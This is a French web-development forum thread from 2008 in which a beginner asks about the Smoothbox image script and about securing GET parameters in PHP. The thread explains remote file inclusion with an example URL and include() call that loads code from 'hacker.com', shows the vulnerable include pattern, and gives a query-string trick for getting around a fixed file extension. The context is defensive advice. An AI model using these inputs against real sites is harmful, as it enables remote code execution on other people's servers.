CONNEXION
  • RetourJeux
    • Sorties
    • Hit Parade
    • Les + populaires
    • Les + attendus
    • Soluces
    • Tous les Jeux
    • Gaming
  • RetourActu Gaming
    • News
    • Astuces
    • Tests
    • Previews
    • Toute l'actu gaming
  • RetourBons plans
    • Bons plans
    • Bons plans Smartphone
    • Bons plans Hardware
    • Bons plans Image et Son
    • Bons plans Amazon
    • Bons plans Cdiscount
    • Bons plans Decathlon
    • Bons plans Fnac
    • Tous les Bons plans
  • RetourJVTech
    • Actus High-Tech
    • Intelligence Artificielle
    • Smartphones
    • Mobilité urbaine
    • Hardware
    • Image et son
    • Tutoriels
    • Tests produits High-Tech
    • Guides d'achat High-Tech
    • JVTech
  • RetourCulture
    • Actus Culture
    • Culture
  • RetourVidéos
    • A la une
    • Gaming Live
    • Vidéos Tests
    • Vidéos Previews
    • Gameplay
    • Trailers
    • Chroniques
    • Replay Web TV
    • Toutes les vidéos
  • RetourForums
    • Hardware PC
    • PS5
    • Switch 2
    • Xbox Series
    • Switch
    • Pokemon pocket
    • FC 25 Ultimate Team
    • League of Legends
    • Tous les Forums
  • PC
  • PS5
  • Xbox Series
  • Switch 2
  • PS4
  • One
  • Switch
  • iOS
  • Android
  • MMO
  • RPG
  • FPS
En ce moment Genshin Impact Valhalla Breath of the wild Animal Crossing GTA 5 Red dead 2
Liste des sujets

[images] Comment utiliser Smoothbox ?

dexter_68
dexter_68
Niveau 10
10 septembre 2008 à 10:45:41

:salut: tout le monde ! :ok:

J'aimerais bien utiliser "Smoothbox" pour afficher les photos de mon site en taille réelle (pour l'instant, j'ai juste la photo qui s'affiche en grand mais j'aimerais mettre une petite animation pour faire plus "pro" :-p ).

Seulement, je ne sais pas comment faire pour utiliser cette option.

Le site qui explique comment faire (si il l'explique...) est en anglais et déjà la programmation expliquée en français me donne parfois du fil à retordre alors en anglais je vous explique pas... :o))

http://gueschla.com/labs/smoothbox/

:d) Je voulais donc vous demander si vous pouviez m'expliquer (le plus détaillé possible) comment faire pour que cela fonctionne (ou mettre les fichiers téléchargés, que changer dans le code source, etc...) :question:

Je vous remercie d'avance ! Vos réponses me serais d'une aide précieuse... :ange:

deepblue
deepblue
Niveau 16
10 septembre 2008 à 16:58:53

Tu fous le js ou tu veux, du moment ou tu fais un lien dessus : <script src="url de la page" type="text/javascript"></script>
L'image devrait (si je ne dis pas de connerie) se trouver dans le même dossier que la page html (dans le js y'a un $('TB_load').innerHTML = "<img src='loading.gif' />", tu peux le modifier ^^)
Quant au code html à utiliser dans la page, tu as des exemples d'illustrations :ok:

dexter_68
dexter_68
Niveau 10
10 septembre 2008 à 17:23:34

:merci: pour ta réponse mais je n'ai pas réussi à faire fonctionner le script :-(

:d) Je vais donc utiliser une seule page normale qui affichera la photo agrandie... :ok:

:d) Par contre, j'aurais une petite question :

Est-ce que si j'utilise des liens du type http://www.monsite.com/infos.php?jour=27&amp;amp;mois=07&amp;amp;annee=2003&amp;amp;titre=Informations (le lien viens du site du zero :o)) ) une personne mal intentionnée pourrait changer les variables et ainsi lancer des scripts PHP afin de hacker mon site ou réaliser des actions illégales à mon insu ??

:d) Si oui, est-ce qu'une méthode plus sécurisée existe :question:

:merci: d'avance pour vos réponses ! :ok:

deepblue
deepblue
Niveau 16
10 septembre 2008 à 17:37:09

"Je vais donc utiliser une seule page normale qui affichera la photo agrandie... :ok: " > ben oui c'est plus simple...(ironique). Il n'y a aucune difficulté pourtant.

Toute données provenant des utilisateurs doivent être vérifiées. Des Failles, y'en existent tout un tas. Les méthodes de sécurisation sont différent suivant ce que l'ont veut sécuriser.

dexter_68
dexter_68
Niveau 10
10 septembre 2008 à 18:49:04

Il n'y a aucune difficulté pourtant. :d) Je n'arrive pas à faire démarrer le script, je ne comprends pas pourquoi... j'ai fait ce que tu m'as indiqué... :-(

:d) Est-ce qu'il est possible de masquer tout ce qu'il y a après les points d'interrogation dans la barre de liens ??

deepblue
deepblue
Niveau 16
10 septembre 2008 à 18:52:45

Dans le code html de la page d'exemples :

<script type="text/javascript"
src="http://gueschla.com/labs/smoothbox/smoothbox.
js"></script>
<link rel="stylesheet"
href="http://gueschla.com/labs/smoothbox/smoothbox
.css" type="text/css" media="screen" />

Dans un exemple :
<a
href="http://gueschla.com/labs/smoothbox/images/pl
ant1.jpg" title="add a caption to title attribute / or leave blank" class="smoothbox" rel="gallery-plants"><img
src="http://gueschla.com/labs/smoothbox/images/pla
nt1_t.jpg" alt="plant 1" /></a>

A partir de là, si tu copie ça, ça doit fonctionner...

Pour ta question : oui, en passant pas du POST au lieu du GET mais c'est plus contraignat.

dexter_68
dexter_68
Niveau 10
10 septembre 2008 à 19:20:25

Même en copiant ce que tu as mis sur le forum, ça ne fonctionne pas : ça m'affiche uniquement l'image sur un fond blanc comme si il n'y avait rien de spécial... :doute:

:d) Pour le POST au lieu du GET, est-ce qu'ont peut l'utiliser autre part que dans un formulaire ? Parce que moi j'aimerais l'utiliser pour un lien hypertexte mais ça ne fonctionne pas quand je met POST à la place de GET :snif:

:d) Est-ce que quelqu'un pourrait m'eclairer sur ma question ?

:merci: d'avance ! :ok:

deepblue
deepblue
Niveau 16
10 septembre 2008 à 20:28:36

Ben passe par du GET :ok:
Ca se sécurise, dans le sens ou tu as "juste" à faire un contrôle sur les variables : type de données, valeurs [...]

dexter_68
dexter_68
Niveau 10
10 septembre 2008 à 21:29:17

En fait, ce que j'aimerais, c'est que les variables ne soient pas modifiables dans la barre d'adresses. Elles sont automatiquement définies et ne doivent pas pouvoir être changées manuellement (car c'est une faille à la sécurité).

:d) J'ai fait une page qui regroupe pleins de photos et lorsqu'on clique sur une miniature, un lien hypertexte renvoie les données nécessaires (dans des variables) afin d'afficher la photo taille réelle sur une autre page.

Exemple de lien (page miniatures):

<a
href="Agrandir.php?dossier=chemin_du_dossier&p
hoto=nom_de_la_photo&theme=theme_de_la_photo">
<img src="chemin_de_la_photo" alt=""/></a>

:d) Est-ce que je peux utiliser le POST (sans formulaire) afin que mes variables ne soient pas modifiables :question:

Sinon, y a-t-il un autre moyen sécurisé :question:

PS : Toutes les valeurs de mes variables sont dans une base de données, aucune intervention de l'utilisateur n'est nécéssaire... :)

deepblue
deepblue
Niveau 16
10 septembre 2008 à 21:35:51

$_GET['dossier'] = test avec is_dir, et si tu sais que tu n'auras pas à naviguer entre des sous dossier, tu fait un str_replace('/', '', $variabledir) avec ton test.
$_GET['nom_de_la_photo'] = file_exists + getimagesizze (pour savoir si c'est une image ou pas)

et le reste dans le même genre. Si tu ne te met pas à tafer comme ça, tu vas vite te restreindre pour la suite :ok:

dexter_68
dexter_68
Niveau 10
10 septembre 2008 à 21:44:27

Est-ce que tu aurais un site qui explique comment faire parce que ça ce n'est pas sur le site du zéro... :o))

:d) En fait, sur la page qui affiche les photos taille réelles, il faut vérifier que les nom inscrits dans les variables existent dans ma base de données et si oui, ont affiche, sinon ont ne fait rien :question:

deepblue
deepblue
Niveau 16
10 septembre 2008 à 21:59:26

http://fr3.php.net/manual/fr/function.is-dir.php
http://fr3.php.net/manualal/fr/function.file-exists.php
http://fr3.php.net/manuall/fr/function.getimagesize.php

Oui pour ta question.

dexter_68
dexter_68
Niveau 10
10 septembre 2008 à 22:05:11

Cool merci ! :)

Je vais essayer de faire ça...

:d) Dernière question (j'espère... :rire2: ) : Je fais les tests avec un if et si toutes les conditions sont remplies j'affiche ma photo. Si elle ne le sont pas, je dois faire quoi pour empêcher une personne de pouvoir utiliser mon site à des fins non légales :question:

Pour empêcher ça par exemple :

Si l'url contient index.php?page=minichat, alors on incluera minichat.php
Si l'url contient index.php?page=news, alors on incluera news.php
Si l'url contient index.php?page=forum, alors on incluera forum.php
Si l'url contient
index.php?page=http://www.hacker.com/pagespeciale,
alors on incluera http://www.hacker.com/pagespeciale.php

Euh, attends une minute là, tu peux m'expliquer le dernier exemple ? o_O

Oui, je crois que des explications s'imposent... Regardez en haut de cette page web, vous pouvez modifier facilement l'url, donc modifier facilement la page qui sera incluse !!! Et vu le code PHP qui a été utilisé, on peut très facilement inclure une page située sur un autre site ! Du coup, en modifiant juste l'url de la page, PHP va exécuter cette instruction :
<?php
include("http://www.hacker.com/pagespeciale.php");
?>

Qu'est-ce qu'on risque ? C'est simple, je n'ai qu'à modifier l'url pour mettre l'adresse d'un fichier PHP sur un FTP à moi, et c'est VOTRE serveur qui exécutera le code de ma page (pagespeciale.php).

deepblue
deepblue
Niveau 16
10 septembre 2008 à 22:17:59

" je dois faire quoi pour empêcher une personne de pouvoir utiliser mon site à des fins non légales :question: " > si tu fous une page blanche quand c'est pas bon, je ne vois pas comment il pourrait l'utiliser à des fins illégaux :ok:

Imagine :

$mapage = $_GET["page"];
include($mapage.".php");

index.php?page=toto > va inclure toto.php
index.php?page=tutu > va inclure tutu.php
index.php?page=toto/titi > va inclure toto/titi.php
index.php?page=http://une_page_piegée > va inclure http://une_page_piegée.php

A partir du moment ou tu testes si $mapage.".php" est un fichier qui existe sur ton serveur (file_exists), tu ne risques presque plus rien.

dexter_68
dexter_68
Niveau 10
10 septembre 2008 à 22:22:33

Excusez-moi pour le double post mais cette question de sécurité me travaille... :snif:

:d) En fait, dans mon code PHP, aucune variable ne contient d'extensions (celle-ci est statique et est ".jpg"). De ce fait, je me posais cette question : si une personne indique à la place de mes variables le nom d'un script .php par exemple, celui-ci sera forcément terminé en ".php.jpg".

:d) Donc est-ce qu'il est quand même possible d'exécuter un script à mon insu ?

dexter_68
dexter_68
Niveau 10
10 septembre 2008 à 22:25:48

Ok !

Merci deepblue pour ta patience et tes réponses ! :ange:

deepblue
deepblue
Niveau 16
10 septembre 2008 à 22:25:59

Lis ce que j'écris... http://fr3.php.net/manualal/fr/function.file-exists.php

Par ailleurs "celui-ci sera forcément terminé en ".php.jpg"" c'est faux : monfichier.php?.jpg

deepblue
deepblue
Niveau 16
10 septembre 2008 à 22:26:22

Ah, grillé avant que je post :p)

Sous forums
  • Aide à l'achat Mac
  • Macintosh
  • Création de Jeux
  • Programmation
  • Création de sites web
  • Linux
  • Internet
  • Steam Deck
  • Hardware
La vidéo du moment